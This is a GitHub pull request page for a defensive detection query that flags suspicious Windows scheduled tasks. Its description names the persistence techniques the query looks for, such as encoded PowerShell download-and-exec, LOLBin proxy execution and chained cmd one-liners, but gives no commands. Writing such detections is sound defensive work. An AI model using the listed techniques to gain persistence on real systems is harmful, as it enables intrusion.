Skip to content

New Query: Suspicious Scheduled Task Creation#66

Merged
dweissbacher merged 1 commit into
mainfrom
submission/d36a9db1-90bb-4a00-a83e-10b9a7de2b50
Jun 29, 2026
Merged

New Query: Suspicious Scheduled Task Creation#66
dweissbacher merged 1 commit into
mainfrom
submission/d36a9db1-90bb-4a00-a83e-10b9a7de2b50

Conversation

@byteray-cql-hub-bot

Copy link
Copy Markdown
Contributor

New Query Submission

Name: Suspicious Scheduled Task Creation
Author: ByteRay GmbH
Submission ID: d36a9db1-90bb-4a00-a83e-10b9a7de2b50

Description

Surfaces newly registered Windows scheduled tasks whose execution command or arguments match patterns commonly abused for persistence and remote code execution: encoded PowerShell combined with download/exec intent, LOLBin proxy execution, payloads launched from user-writable paths, embedded web URLs, and chained cmd one-liners. Tasks created remotely (RemoteAddressIP4/IP6 populated) are flagged as a higher-priority lateral-movement signal. A commented author filter lets analysts suppress their own validated software-deployment / RMM accounts after baselining.


This PR was automatically created by the CQL Hub submission pipeline.

@dweissbacher dweissbacher merged commit a5fbeb0 into main Jun 29, 2026
2 checks passed
@dweissbacher dweissbacher deleted the submission/d36a9db1-90bb-4a00-a83e-10b9a7de2b50 branch June 29, 2026 10:19
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

1 participant